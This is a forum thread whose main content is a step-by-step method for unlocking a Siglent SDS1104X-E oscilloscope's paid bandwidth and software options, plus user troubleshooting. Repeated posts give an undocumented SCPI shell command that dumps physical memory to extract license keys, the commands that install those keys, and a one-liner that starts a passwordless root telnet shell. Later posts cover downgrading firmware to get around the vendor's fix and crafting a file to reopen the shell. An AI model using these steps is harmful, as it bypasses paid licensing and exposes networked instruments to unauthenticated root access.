  • Avoir une clef USB qui est reconnu par l'oscilloscope (faire une copie d'écran dessus pour essayer)
  • Se connecter à l'oscilloscope avec l'interface web
  • Dans l'onglet SCPI, envoyer la commande SCOPEID? et noter le résultat, il est sous la forme wwww-xxxx-yyyy-zzzz
  • Envoyer la command *IND? on récupère le numéro de série sous la forme SDSxxxxxxxxxxxx
  • Envoyer la commande SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Attendre un certain temps que cette commande se termine (on va dire 1mn, il y a 240Mo à écrire sur la clef USB)
  • Mettre la clef USB sur un ordi, il doit y avoir un fichier memdump.bin
  • Ouvrir ce fichier dans un éditeur Hexa (J'utilise HxD sous windows)
  • Chercher son SCOPEID sans les - (donc wwwwxxxxyyyyzzzz)
  • On doit avoir juste avant un 100M (ou 200M en fonction de son oscilloscope), c'est la bande passante active et encore un peu (37 caractères) au dessus SDS1000X-E
  • Un peu plus bas (116 caractères) il doit y avoir des lettres, en fait 2 groupes de 16 caractères et un de 32 caractères (que l'on coupe en deux), ce qui nous fait 4 groupes de 16 caractères correspondant à la clef pour activer l'option de bande passante (respectivement 100MHz, 200MHz, 50MHz, 70MHz)
  • Pour activer la licence correspondant il faut envoyer la commande SCPI MCBD clef et éteindre/rallumer le scope
  • Repartir du début du fichier et chercher son numéro de série (SDSxxxxxxxxxxxx), chercher jusqu'à trouver celui ou il est écrit MSO 5 caractères avant
  • On a un peu plus bas (69 ou 117 caractères) un groupe de caractères lisibles, il y a 3 groupes de 16 caractères qui correspondent à la clef d'activation des options, si cette clef apparaît 2 fois c'est qu'elle est déjà active. Les options sont respectivement (AWG, WIFI, MSO) et peuvent être activé avec la commande SCPI LCISL option,clef
Une commande SCPI intéressante pour explorer l'oscilloscope (attention de ne pas tout casser), SHELLCMD telnetd -l/bin/sh -p9999 ouvre un accès telnet (root shell) sans mot de passe.
« Last Edit: June 07, 2019, 06:49:27 am by Gege34 »
 
The following users thanked this post: kikook, patman27, 13, tek2232, HookEm, Apofview, boblatino, ArcticPhoenix0, hevak

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #48 on: March 11, 2019, 09:43:18 am »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located 10's of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scopes physical memory, and memory malloc'd by the linux kernel to the scope task may or may not be contiguous within physical memory.
A hollow voice says 'PLUGH'.
 

Offline mroek

  • Contributor
  • Posts: 49
  • Country: no
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #49 on: March 11, 2019, 10:17:29 am »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located 10's of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scopes physical memory, and memory malloc'd by the linux kernel to the scope task may or may not be contiguous within physical memory.

True, but it seems many have been lucky in finding keys using this method (myself included). And also, it might be possible to just reboot and retry if not successful the first time, since the memory allocations might not be exactly the same for every boot and application launch.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #50 on: March 11, 2019, 10:27:01 am »
I agree with you (specially vtwin@cox.net) that this is not the most reliable way to find the keys, but it is the simplest and it works for a majority of people.
And to improve the chances of success of this method, it is recommanded to do it (the dump of the memory) on an oscilloscope which has just been powered on.
 

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #51 on: March 11, 2019, 01:57:28 pm »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located 10's of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scopes physical memory, and memory malloc'd by the linux kernel to the scope task may or may not be contiguous within physical memory.

True, but it seems many have been lucky in finding keys using this method (myself included). And also, it might be possible to just reboot and retry if not successful the first time, since the memory allocations might not be exactly the same for every boot and application launch.

There is also the fact that the memory allocator will most likely return memory aligned on 16 byte boundaries (to accommodate neon vector types). This makes it impossible for anything 16 bytes or under to cross a page (4k) boundary.
 

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #52 on: March 11, 2019, 03:49:25 pm »
There is also the fact that the memory allocator will most likely return memory aligned on 16 byte boundaries (to accommodate neon vector types). This makes it impossible for anything 16 bytes or under to cross a page (4k) boundary.

My scope returned memory keys not aligned on a 4k boundary.... in one instance, 12 bytes of the key was in one 4k segment, and the remaining 4 bytes of the key were located 20+ megabytes earlier in the memory dump. It was also pretty consistent in this regard, where I would get 8 or 12 bytes in one 4k chunk and have to go look for the remaining portion elsewhere at the start of a 4k chunk. I created 10 cold-start dumps with various delays upon startup to see how the delay time, or things I did on the scope's panel) affected the placement of the keys.

(of course I also was not using the SHELLCMD method to gain root access... I used version of the firmware with the "known" root password to get to a telnet prompt the "old" way, before the SHELLCMD bypass was known, so this may have played a role too.)

It is good the "simple" method works for a large number of people... but new people reading the thread should simply be aware the "simple" method may not always work and to be prepared for the possibility of a "deep dive".... that's all.
A hollow voice says 'PLUGH'.
 
The following users thanked this post: patman27, HookEm

Offline HookEm

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #53 on: March 23, 2019, 11:02:05 pm »
@Gege34: Thanks for the excellent 14-step summary:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/msg2258400/#msg2258400

@vtwin@cox.net: In my case, you were proven correct!
My Option keys were broken apart: I only found 24 characters (1 complete key + 1/2 of another) at the expected "simple method" location. So I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

Wow, I'm so glad I went with 1104X-E... This forum rocks!
« Last Edit: March 23, 2019, 11:09:23 pm by HookEm »
 
The following users thanked this post: Gege34, vtwin@cox.net, Dirtynut

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #54 on: March 23, 2019, 11:35:23 pm »
My Option keys were broken apart: I only found 24 characters (1 complete key + 1/2 of another) at the expected "simple method" location. So I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

That's what I call doing your homework!  :-+
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #55 on: April 28, 2019, 02:41:14 am »
@vtwin@cox.net: I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

Any chance you'd share that program?

Thanks,
Josh
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #56 on: April 30, 2019, 01:16:48 pm »
English:
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1mn, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key
An interesting SCPI command to explore the scope (warning to not brick it), SHELLCMD telnetd -l/bin/sh -p9999 open a telnet (root shell) without password.

I tried this with firmware 7.1.6.25R2 and it didn't work well at all. The keys in my memdump file were reversed, or in different areas, making it very difficult to guess the correct order and corresponding function of each key.

After upgrading to firmware 7.1.6.1.26 it worked perfectly. The bandwidth keys and options keys were all correctly oriented, and exactly where they should be.

I installed all the option keys via SCPI, and they immediately became active/permanent without need to restart the scope. After restarting, the permanent keys are still working.

This gives me the impression that Siglent was trying to make it easier to hack the keys.

Side note: there was reference in my 25R2 memdump to Pikachu for some reason.  ???

Thanks,
Josh
« Last Edit: April 30, 2019, 01:30:00 pm by KungFuJosh »
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline bloomingtonmike

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #57 on: May 01, 2019, 11:02:45 pm »
In the above post the serial number command is *IDN? Btw.

Thank you everyone for the reassurance. Mem dump and scpi commands worked great just as Josh said.
 
The following users thanked this post: Apofview

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #58 on: May 02, 2019, 12:55:53 am »
In the above post the serial number command is *IDN? Btw.

Thank you everyone for the reassurance. Mem dump and scpi commands worked great just as Josh said.

The serial number is also listed on the home screen of the Siglent web interface...so no effort really needed there with SCPI.

Glad it worked for you too.  :)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline bloomingtonmike

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #59 on: May 02, 2019, 01:20:50 am »
Home screen is where I got it too Josh. It was just bugging me why I could not get the serial number back from the scpi interface so I looked it up. Just a typo.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #60 on: May 02, 2019, 11:29:17 am »
lol, I was clearly lazier than you about it. I saw it on the home screen, and grabbed it before I tried any of the commands. ;)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #61 on: May 02, 2019, 12:00:21 pm »
Its not that they are making it easier, Its more a case of a lot of people digging into whats happening to try and resolve there own desires and along the way finding odd quirks that benefit the whole.

Its like a school network admin Vs a school of high schoolers, one side is busy with other things, the other is full of hundreds or thousands of bored people with nothing better to do

So off I go running a incrementing character search on SCPI up to 12 characters because I wanted to find command for Bode plot mode, ended up digging up a lot in the process, didn't find the command and so went on to disassembling the system application to see if there was any way to add it, found more commands in the process and finally found a work around.

Then used some of his finding to try and help someone copy off a file of interest and a linux guru jumped up and thought, "lets try and dump the memory manually with this command some guy has shown us how to use." and here we are today.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #62 on: May 02, 2019, 01:03:13 pm »
Its not that they are making it easier, Its more a case of a lot of people digging into whats happening to try and resolve there own desires and along the way finding odd quirks that benefit the whole.

Its like a school network admin Vs a school of high schoolers, one side is busy with other things, the other is full of hundreds or thousands of bored people with nothing better to do

So off I go running a incrementing character search on SCPI up to 12 characters because I wanted to find command for Bode plot mode, ended up digging up a lot in the process, didn't find the command and so went on to disassembling the system application to see if there was any way to add it, found more commands in the process and finally found a work around.

Then used some of his finding to try and help someone copy off a file of interest and a linux guru jumped up and thought, "lets try and dump the memory manually with this command some guy has shown us how to use." and here we are today.

Older firmware was significantly harder to get the codes. Newer firmware was simple as hell. There's a significant sequential difference in ease of acquisition based on firmware versions. If that's not on purpose, that would be an insane coincidence.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #63 on: May 02, 2019, 01:20:17 pm »
Older firmware was significantly harder to get the codes. Newer firmware was simple as hell. There's a significant sequential difference in ease of acquisition based on firmware versions. If that's not on purpose, that would be an insane coincidence.

This is not something preplanned. That is the way the kernel is segmenting the processes mem in realtime. If you have that particular memory area in a segment frontier, you may end up with the lics splitted. If the area is in the middle of the segment, then everything will be next to each other.

Of course, based on the average level of expertise of the members, everyone should be able/obliged to find their solution without all these "guides for dummies".
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #64 on: May 02, 2019, 01:26:18 pm »
This is not something preplanned. That is the way the kernel is segmenting the processes mem in realtime. If you have that particular memory area in a segment frontier, you may end up with the lics splitted. If the area is in the middle of the segment, then everything will be next to each other.

Of course, based on the average level of expertise of the members, everyone should be able/obliged to find their solution without all these "guides for dummies".

Why was it being segmented differently only based on the firmware change? I tried dumping the memory more than 10 times with 25R2 and it was never together.

BTW- as a dummy, I dig the guides. ;)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #65 on: May 02, 2019, 01:30:43 pm »
Why was it being segmented differently only based on the firmware change? I tried dumping the memory more than 10 times with 25R2 and it was never together.

Because the program changes makes different memory allocations and, as more memory is (de)allocated, you may end up in a segment border.

And, if you dump before going to the lic menu or dump after trying to register a lic, you'll probably obtain completely different results...  ::)
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #66 on: May 02, 2019, 01:55:00 pm »
Because the program changes makes different memory allocations and, as more memory is (de)allocated, you may end up in a segment border.

And, if you dump before going to the lic menu or dump after trying to register a lic, you'll probably obtain completely different results...  ::)

I tried a number of different routines and timing with 25R2 to get the dump. All the gibberish besides the codes changed, but never the codes.

From what you're saying, it sounds like I could have reflashed 25R2 and had similar results as the newer firmware? I'd be tempted to downgrade and test that theory if not for my laziness and lack of benefiting from it.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #67 on: May 02, 2019, 02:02:55 pm »
From what you're saying, it sounds like I could have reflashed 25R2 and had similar results as the newer firmware? I'd be tempted to downgrade and test that theory if not for my laziness and lack of benefiting from it.

No need to. Different people in this forum have reported different results with the same FW versions. Keep yourself in "laziness and lack of benefiting from it" mode.
 
The following users thanked this post: KungFuJosh

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #68 on: May 16, 2019, 07:37:28 pm »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?
 

Offline Illusionist

  • Regular Contributor
  • *
  • Posts: 111
  • Country: gb
  • Why is the rum gone?
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #69 on: May 18, 2019, 07:11:48 am »
Well, I'm requesting your help...

I did that exact procedure myself on a new SDS1104X-E two weeks ago. It worked perfectly for me - couldn't believe it was so simple. Although I did have to search the file twice for the keys because I just didn't recognize them on the first pass.

Are you sure your USB stick is recognzied by the 'scope (two of mine were, one wasn't), and does your 'scope have the latest firmware (6.1.26)? The latest firmware makes a difference, from a quick review of the thread, for finding the keys at least.

When I dumped the memory, the USB stick's light started flashing, but never stopped. Eventually I gave up waiting for it to stop (15 minutes or so) and shut down and pulled it. The file was on there.
« Last Edit: May 18, 2019, 07:15:00 am by Illusionist »
Agilent 34410A, GW Instek 8251A, Thurlby 1905A, Siglent DS1104X-E(unlocked), SDG1032X(unlocked), Micsig DP10013 MX, LeCroy PP008 500MHz Probes, Fluke 179
 

Offline Apofview

  • Contributor
  • Posts: 15
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #70 on: May 18, 2019, 12:14:21 pm »
It is *IDN? not IND? it took me a while...  |O :-DD
16GB usb stick worked, no problem, and stick did not have indication led so after dump command I pushed print button to make sure that scope is able to write to usb, scope prints on lcd file written to usb, not sure is this check valid but for me it worked...
scope version 8.1.6.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #71 on: May 18, 2019, 12:18:08 pm »
It is *IDN? not IND? it took me a while...  |O :-DD
16GB usb stick worked, no problem, and stick did not have indication led so after dump command I pushed print button to make sure that scope is able to write to usb, scope prints on lcd file written to usb, not sure is this check valid but for me it worked...
scope version 8.1.6.

The serial number is also available on the home screen of the web interface, no commands necessary.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #72 on: May 18, 2019, 10:51:41 pm »
Are you sure your USB stick is recognzied by the 'scope (two of mine were, one wasn't), and does your 'scope have the latest firmware (6.1.26)? The latest firmware makes a difference, from a quick review of the thread, for finding the keys at least.

Yes, I am sure it is recognised by the scope, since I could save a screenshot on it and then view it on my computer. I suspect it is the path of the USB stick that is wrong, since I tried SHELLCMD echo something > /usr/bin/siglent/usr/mass_storage/U-disk0/something.txt and it didn't do anything and nothing was on the key when I checked on my computer. Or could I find the path in another way?
« Last Edit: May 18, 2019, 10:54:32 pm by jtruc34 »
 

Offline Apofview

  • Contributor
  • Posts: 15
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #73 on: May 19, 2019, 06:40:21 am »
English:
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface (conect scope to net and enable it in the IO tab)
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1min, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above is SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key

Thank You, this info and of course Dave-s tear down and review video are the reasons why I choose Siglent.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #74 on: May 19, 2019, 11:20:57 am »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?

At the end of your command line add ";sync" without quotes.
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #75 on: May 20, 2019, 01:08:15 am »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?

At the end of your command line add ";sync" without quotes.

I've just tried it, and it didn't change anything...
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #76 on: May 20, 2019, 08:24:53 am »
Try this command SHELLCMD telnetd -l/bin/sh -p9999
And open a telnet application to your Siglent IP (root shell without password)
And list all device with ls /usr/bin/siglent/usr/mass_storage
to see if you have the U-disk0 or other thing.
And you can try the dump command in this telnet cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #77 on: May 20, 2019, 10:56:11 am »
When I telneted it, it requested a login, I wrote root, and I just pressed enter when it requested the password. It then said incorrect password.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #78 on: May 20, 2019, 11:01:27 am »
Using that way, you must telnet to port 9999 !!!
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #79 on: May 20, 2019, 01:03:58 pm »
If I type telnet <ip> 9999, it says "Impossible to connect to the host, on the port 9999." It works if I don't specify any port. Until I have to enter the login and the password, of course...
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #80 on: May 20, 2019, 02:29:18 pm »
If I type telnet <ip> 9999, it says "Impossible to connect to the host, on the port 9999." It works if I don't specify any port. Until I have to enter the login and the password, of course...

That means that your SHELLCMD is not taking effect. Please re-study the matter and try again.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #81 on: May 20, 2019, 02:37:19 pm »
Also check if you have a firewall rule on your network router.
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #82 on: May 20, 2019, 03:22:41 pm »
Also check if you have a firewall rule on your network router.

Since I was connecting the scope to a wireless access point created on my computer, I just deactivated temporarly the firewall of my computer, and it still didn't work.

That means that your SHELLCMD is not taking effect. Please re-study the matter and try again.

Since I really haven't got any experience in the subject, I really don't know what to do. What could I study, what changement could I make? Shouldn't your unit be the same as mine?

By the way, thank you for your help.
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #83 on: May 20, 2019, 03:36:45 pm »
It works if all is ok including your network connection with scope

Most easy and reliable is direct connection from PC lan port to scope lan port (this is totally hassle free)
Direct or cross, not need care in modern systems.

This is just only example. You can use different IP setting what is ok in your system and for you. This 222.222.222.222 was just because I can remember it with my vintage memory and it is fast to write.

1.a Conf your scope IP settings and press save. (I do even reboot, perhaps not need but least some old system need it) (image)

1.b Conf your PC for fixed IP with settings as scope.  (not image because it depends your system)

2. Open PC web browser and give this IP address, just plain IP and nothing else. (image)
(scope responds with its internal server)
Send command as in image

3.  Open: PuTTYtel  (for avoid hassle this is one of most reliable without this and that traps)
(never ever use wondows own crapjunkshit telnet)
Write IP and this port
Push Open

4. next you see this window and  / #

5. you can command it and now. Do not try this and that and oops method... do not enter what you do not really know or what is not perfectly right typed - copied  from true reliable source. one mistake and... all want believe this never happen.

« Last Edit: May 20, 2019, 03:45:19 pm by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 
The following users thanked this post: Apofview

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #84 on: May 21, 2019, 09:54:48 pm »
Well, it finally worked. The only error was to use EasyScopeX, that apparently doesn't handle SHELLCMD. Being connected in WLAN using a wireless access point works. I used telnet from Windows and it worked very well. In fact, I don't need to anymore, because SHELLCMD apprently works.

Thank you for your help anyway!
 

Offline ScottW

  • Contributor
  • Posts: 8
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #85 on: May 24, 2019, 06:05:10 pm »
I got my 1104x-e a few days ago.  It came with firmware 8.1.6.1.26.  I had no trouble using SHELLCMD to create the memory dump, and no trouble identifying the keys via hex editor.  (I did not actually use any of the keys; I just recorded them for future use.)

Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday).  With the new firmware, using SHELLCMD to create memory dump does nothing (no file created).  Also the SHELLCMD to start telnetd on p9999 seems to do nothing (attempt to connect via telnet client subsequently fails).

I'm assuming the codes I harvested from 6.1.26 are still valid, but unsure whether the SCPI MCBD command still works (have not tried it).

Perhaps I'm doing something wrong, but it looks to me like 6.1.33 disables the SCPI SHELLCMD, or at least blocks access the /dev/mem and telnetd.  Can anyone else confirm?
 
The following users thanked this post: plurn

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #86 on: May 24, 2019, 06:25:55 pm »
Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday).  With the new firmware, using SHELLCMD to create memory dump does nothing (no file created).  Also the SHELLCMD to start telnetd on p9999 seems to do nothing (attempt to connect via telnet client subsequently fails).

Confirmed.

SHELLCMD is no more.

MCBD still exists.

Well, maybe it's time for a .ADS to do the memdump...  ::)
 
The following users thanked this post: ewaller

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #87 on: May 24, 2019, 06:53:44 pm »
Confirmed.
SHELLCMD is no more.

Well, that's not shocking. You know it was just a matter of time before they closed that loophole.

Larger question would be whether or not it is possible to "downgrade" to an older version of the firmware and re-gain SHELLCMD access.
A hollow voice says 'PLUGH'.
 

Offline ScottW

  • Contributor
  • Posts: 8
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #88 on: May 24, 2019, 07:13:49 pm »
Larger question would be whether or not it is possible to "downgrade" to an older version of the firmware and re-gain SHELLCMD access.

The answer is.... YES.  I was able to flash back (down) to 6.1.26 successfully and SHELLCMD again works.
 

Offline ewaller

  • Contributor
  • Posts: 30
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #89 on: May 24, 2019, 07:32:03 pm »
SHELLCMD is no more.

MCBD still exists.

Well, maybe it's time for a .ADS to do the memdump...  ::)

Well, that is too bad.  I use it to allow me to use NTP to set the clock, among other reasons aside from obtaining memory dumps.   I suppose I could just stay with the version I have.    But, I wonder if a .ADS could be crafted to open a telnet port?  Unless they have munged Bash or telnetd, it should work.   Would you be interested in working on that with me?


Edit:  I just checked the Siglent America website and checked the release notes.  It looks like they have been busy fixing bugs and adding features; stuff that makes upgrading worthwhile.  Funny thing, they don't mention disabling SHELLCMD on the release notes  ???
« Last Edit: May 24, 2019, 07:47:23 pm by ewaller »
 
The following users thanked this post: patman27

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #90 on: May 25, 2019, 09:04:35 am »
...
Today I installed latest firmware, 6.1.33, released 2019-05-23 (yesterday). ...

... it looks to me like 6.1.33 disables the SCPI SHELLCMD, or at least blocks access the /dev/mem and telnetd. ...

Thanks for finding this out. I wonder if sales of SDS1104X-E will plummet now that Siglent is trying to discourage hacking, rather than ignoring it.
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #91 on: May 25, 2019, 09:46:30 am »
... now that Siglent is trying to discourage hacking, rather than ignoring it.

they can close every hole, if the wish, at any time. All they did is to disable general security hole (open telnet, no auth to get telnet).
But as one can still downgrade (which need physical access to SDS, which is then not a security hole by definition), which is sufficient for all buyers to hack it, we still save.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 
The following users thanked this post: Performa01, patman27

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #92 on: May 25, 2019, 09:52:03 am »
